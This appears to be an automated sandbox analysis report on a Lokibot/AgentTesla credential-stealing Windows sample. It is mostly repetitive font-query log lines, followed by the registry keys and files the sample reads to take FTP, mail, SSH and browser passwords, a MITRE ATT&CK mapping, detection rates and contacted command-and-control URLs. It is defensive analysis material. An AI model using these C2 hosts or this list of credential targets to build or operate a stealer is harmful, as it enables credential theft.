                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\FJbeidnZOF.exe, Code function: 5_2_00406069 GetUserNameW, 5_2_00406069
Source: C:\Users\user\Desktop\FJbeidnZOF.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Lokibot
Source: Yara match, File source: 00000001.00000002.238998741.0000000003529000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: FJbeidnZOF.exe PID: 5472, type: MEMORY
Source: Yara match, File source: Process Memory Space: FJbeidnZOF.exe PID: 5392, type: MEMORY
Source: Yara match, File source: 1.2.FJbeidnZOF.exe.2592e78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.FJbeidnZOF.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.FJbeidnZOF.exe.37167b0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.FJbeidnZOF.exe.400000.0.unpack, type: UNPACKEDPE

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\FJbeidnZOF.exe, Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\Desktop\FJbeidnZOF.exe, Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl

Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\FJbeidnZOF.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\FJbeidnZOF.exe, File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\FJbeidnZOF.exe, File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\Desktop\FJbeidnZOF.exe, File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
Source: C:\Users\user\Desktop\FJbeidnZOF.exe, File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts

Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\FJbeidnZOF.exe, Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\FJbeidnZOF.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Tries to steal Mail credentials (via file registry)
Source: C:\Users\user\Desktop\FJbeidnZOF.exe, Code function: PopPassword 5_2_0040D069
Source: C:\Users\user\Desktop\FJbeidnZOF.exe, Code function: SmtpPassword 5_2_0040D069
Source: Yara match, File source: 00000001.00000002.238998741.0000000003529000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: FJbeidnZOF.exe PID: 5472, type: MEMORY
Source: Yara match, File source: 1.2.FJbeidnZOF.exe.2592e78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.FJbeidnZOF.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.FJbeidnZOF.exe.37167b0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.FJbeidnZOF.exe.400000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

The matrix is listed by tactic (column); techniques matched by signatures carry their signature count in parentheses.

Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
Execution: Command and Scripting Interpreter (2), Scheduled Task/Job, At (Linux), At (Windows), Cron, Launchd, Scheduled Task, Command and Scripting Interpreter
Persistence: Path Interception, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job
Privilege Escalation: Access Token Manipulation (1), Process Injection (112), Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items, Scheduled Task/Job
Defense Evasion: Disable or Modify Tools (1), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (3), Masquerading (1), Virtualization/Sandbox Evasion (21), Access Token Manipulation (1), Process Injection (112)
Credential Access: OS Credential Dumping (2), Credentials in Registry (2), Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
Discovery: Account Discovery (1), File and Directory Discovery (1), System Information Discovery (13), Security Software Discovery (111), Process Discovery (1), Virtualization/Sandbox Evasion (21), System Owner/User Discovery (1), Remote System Discovery (1)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Shared Webroot
Collection: Archive Collected Data (1), Data from Local System (2), Email Collection (1), Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: Ingress Tool Transfer (3), Encrypted Channel (1), Non-Application Layer Protocol (3), Application Layer Protocol (213), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points, Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact, Generate Fraudulent Advertising Revenue


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
FJbeidnZOF.exe | 22% | Virustotal |
FJbeidnZOF.exe | 28% | ReversingLabs | Win32.Trojan.AgentTesla
FJbeidnZOF.exe | 100% | Joe Sandbox ML |

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
1.2.FJbeidnZOF.exe.37167b0.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.2.FJbeidnZOF.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

Domains

Source | Detection | Scanner | Label
amrp.tw | 20% | Virustotal |

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
amrp.tw | 35.247.234.230 | true | false | | unknown

Contacted URLs

Name | Malicious | Reputation (antivirus detections listed beneath each entry)
http://amrp.tw/kayo/gate.php | false | unknown
• 20%, Virustotal
• Avira URL Cloud: malware
http://kbfvzoboss.bid/alien/fre.php | true | unknown
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
http://alphastand.top/alien/fre.php | true | unknown
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
http://alphastand.win/alien/fre.php | true | unknown
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe
http://alphastand.trade/alien/fre.php | true | unknown
• URL Reputation: safe
• URL Reputation: safe
• URL Reputation: safe

                URLs from Memory and Binaries


                                            Contacted IPs


Public

IP: 35.247.234.230
Domain: amrp.tw
Country: United States
ASN: 15169
ASN Name: GOOGLEUS
Malicious: false

Private

IP: 192.168.2.1

                                            General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 399798
Start date: 29.04.2021
Start time: 09:17:34
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 16s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: FJbeidnZOF.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 27
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/3@81/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 5.7% (good quality ratio 5.1%)
• Quality average: 70.4%
• Quality standard deviation: 33.5%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 48
• Number of non-executed functions: 5
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
                                            • Excluded IPs from analysis (whitelisted): 93.184.220.29, 104.43.139.144, 168.61.161.212, 92.122.145.220, 13.88.21.125, 104.42.151.234, 184.30.20.56, 20.50.102.62, 205.185.216.10, 205.185.216.42, 92.122.213.249, 92.122.213.247, 20.54.26.129
